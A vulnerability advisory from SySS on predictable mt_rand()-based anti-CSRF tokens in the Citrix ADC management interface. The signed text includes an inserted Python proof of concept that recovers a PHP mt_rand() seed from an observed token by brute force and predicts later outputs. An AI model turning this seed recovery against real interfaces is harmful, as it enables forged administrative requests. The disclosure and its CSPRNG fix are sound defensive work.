-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2020-021
Product: ADC/NetScaler
Manufacturer: Citrix
Tested Version(s): NS13.0 52.24
Vulnerability Type: Use of Cryptographically Weak Pseudo-Random Number
                    Generator (CWE-338)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2020-05-06
Public Disclosure: 2020-10-02
CVE Reference: None assigned
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

NetScaler/Citrix ADC is a multi-protocol reverse proxy appliance, commonly
used to externally provide Citrix Remote Desktop Services or SSL VPN.

The manufacturer describes the product as follows (see [1]):

"Citrix ADC is the most comprehensive application delivery and load
balancing solution for monolithic and microservices-based applications.
Which means you can deliver a better user experience, on any
device—anywhere."

Due to the use of a weak random number generator, the anti-CSRF tokens of
the Citrix ADC management web interface may be predictable, so that the
interface may be vulnerable to cross-site request forgery (CSRF) attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Citrix ADC management web interface generates its custom anti-CSRF
token values (rand/rand_key) using the following PHP code:

    list($usec, $sec) = explode(" ", microtime());
    $time_in_micro_seconds = number_format((double) $sec + (double) $usec, 6, ".", "");
    strval(mt_rand()) . "." . strval(preg_replace("/\./", "", $time_in_micro_seconds));

Neither the current time nor the output of PHP's mt_rand() is a suitable,
unpredictable value for such a security-sensitive purpose. The time
component is not secret at all: it is the request time in microseconds,
and the server's own Date header already reveals it to the second.

The mt_rand() generator is implicitly seeded on each request from the
current time, the process ID, and a value from PHP's internal linear
congruential generator (LCG). Because the seed is only 32 bits wide, a
single observed mt_rand() output already allows the seed of that request
to be recovered by exhaustive search [4]. By observing enough outputs, an
attacker may furthermore be able to recover the LCG's internal state
[4, 5] and thereby predict the seeds of subsequent requests, the mt_rand()
outputs, and ultimately the CSRF tokens in use.
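The following Python program is an added illustration and is not code from
Citrix or SySS. It rebuilds the token scheme quoted above on top of a
PHP-compatible mt_rand() (assumption: PHP 7.1 or later, i.e. standard
MT19937 seeded with init_genrand() and mt_rand() returning the 32-bit
output shifted right by one), recovers the seed from a single observed
token by brute force in a small window (php_mt_seed [4] runs the same
search over all 2^32 seeds), predicts the mt_rand() values that follow
within the same request, and contrasts the weak token with the CSPRNG
token the Solution section asks for. All names (PhpMtRand, weak_token,
recover_seed, ...) and the seed and timestamp values are constructed for
the example. Recovering the seeds of later requests via the LCG, as
described in [5], is outside the scope of this snippet.

```python
"""Added example, not Citrix/SySS code: why "mt_rand() . '.' . time" is
predictable. Assumes PHP >= 7.1 mt_rand() semantics (standard MT19937,
init_genrand() seeding, 31-bit output). Seeds/timestamps are constructed."""
import secrets

N, M = 624, 397
MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF
MASK32 = 0xFFFFFFFF


def _init_state(seed, words=N):
    """init_genrand() as used by php_mt_initialize(). `words` lets the seed
    search stop early: the first output only needs state[0], [1] and [M]."""
    s = [seed & MASK32]
    for i in range(1, words):
        prev = s[-1]
        s.append((1812433253 * (prev ^ (prev >> 30)) + i) & MASK32)
    return s


def _temper(y):
    """MT19937 output tempering."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & MASK32


class PhpMtRand:
    """Minimal PHP-7.1-compatible generator: mt_srand(seed), then mt_rand()."""

    def __init__(self, seed):
        self.state = _init_state(seed)
        self.index = N

    def _reload(self):
        s = self.state
        for i in range(N):
            y = (s[i] & UPPER) | (s[(i + 1) % N] & LOWER)
            s[i] = s[(i + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.index = 0

    def mt_rand(self):
        if self.index >= N:
            self._reload()
        y = _temper(self.state[self.index])
        self.index += 1
        return y >> 1  # PHP drops the low bit and returns 31 bits


def first_mt_rand(seed):
    """First mt_rand() after mt_srand(seed), from only M+1 state words.
    This shortcut is what makes a full 2^32 seed search practical."""
    s = _init_state(seed, M + 1)
    y = (s[0] & UPPER) | (s[1] & LOWER)
    return _temper(s[M] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)) >> 1


def weak_token(seed, sec, usec):
    """The advisory's scheme: strval(mt_rand()) . "." . time without the dot.
    `seed` stands for PHP's implicit per-request seed (time, pid, LCG)."""
    return f"{PhpMtRand(seed).mt_rand()}.{sec}{usec:06d}"


def recover_seed(observed_token, lo, hi):
    """Brute-force the seed whose first mt_rand() matches the token prefix.
    The window [lo, hi) keeps the example fast; an attacker scans 2^32."""
    observed = int(observed_token.split(".", 1)[0])
    for seed in range(lo, hi):
        if first_mt_rand(seed) == observed:
            return seed
    return None


def predict_next(seed, count):
    """mt_rand() values that follow the observed one in the same request."""
    g = PhpMtRand(seed)
    g.mt_rand()  # the value already seen in the token
    return [g.mt_rand() for _ in range(count)]


def strong_token():
    """What the Solution asks for: CSPRNG output. PHP: bin2hex(random_bytes(32))."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    token = weak_token(1, 1588752000, 123456)  # constructed seed and time
    print("observed token :", token)
    seed = recover_seed(token, 0, 256)
    print("recovered seed :", seed)
    print("next mt_rand() :", predict_next(seed, 3))
    print("CSPRNG token   :", strong_token())
```

With the constructed seed 1 the token starts with 895547922, which is also
what `mt_srand(1); echo mt_rand();` prints on PHP 7.1 or later, so the
generator can be cross-checked against a real PHP installation before
trusting the search.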
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Use a properly seeded cryptographically secure pseudo-random number
generator (CSPRNG), for example PHP's random_bytes(), to generate
unpredictable CSRF tokens.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2020-05-04: Vulnerability discovered
2020-05-06: Vulnerability reported to manufacturer
2020-06-03: Vendor assessment: considered a low-priority defense-in-depth
            issue
2020-10-02: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website for Citrix ADC
    https://www.citrix.com/products/citrix-adc/
[2] SySS Security Advisory SYSS-2020-021
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-021.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/
[4] PHP mt_rand() seed cracker
    https://www.openwall.com/php_mt_seed
[5] PRNG: Pwning Random Number Generators
    https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAl927T8ACgkQdo7+K7Pl
Pdp+vgf+Omb3kFFeOsAxFEZmh4Hsghu7i40RcsGa8mQBjRzGLTVy+8JtUp9wyFXn
JfRlFBVjwQZjdvFPY05JtcNgrUQ/4s+XPWXp08jl58+ZGDNRFgYqADbjw3cpikxM
psJ0pYE1XsYu0VCqQLXVSlsRuBODfdhmAFmiIf84qg8YroLcFNPnWQaAXd22t9VE
homCOf0+xLs/ezXgG0zubmiUmW0fqvmvrdvOU3IoAWBicfy7D+88bfWgRRba3XvM
RS6rzqOL+fX+aVywqcDhtDEjdk9S+Ku8PJcTF9COvQSZbNpynAUd00h13ZDjI5mC
8Y1ju2RxBRAU+HQE8YX+7P1IHg7Kcg==
=4nv8
-----END PGP SIGNATURE-----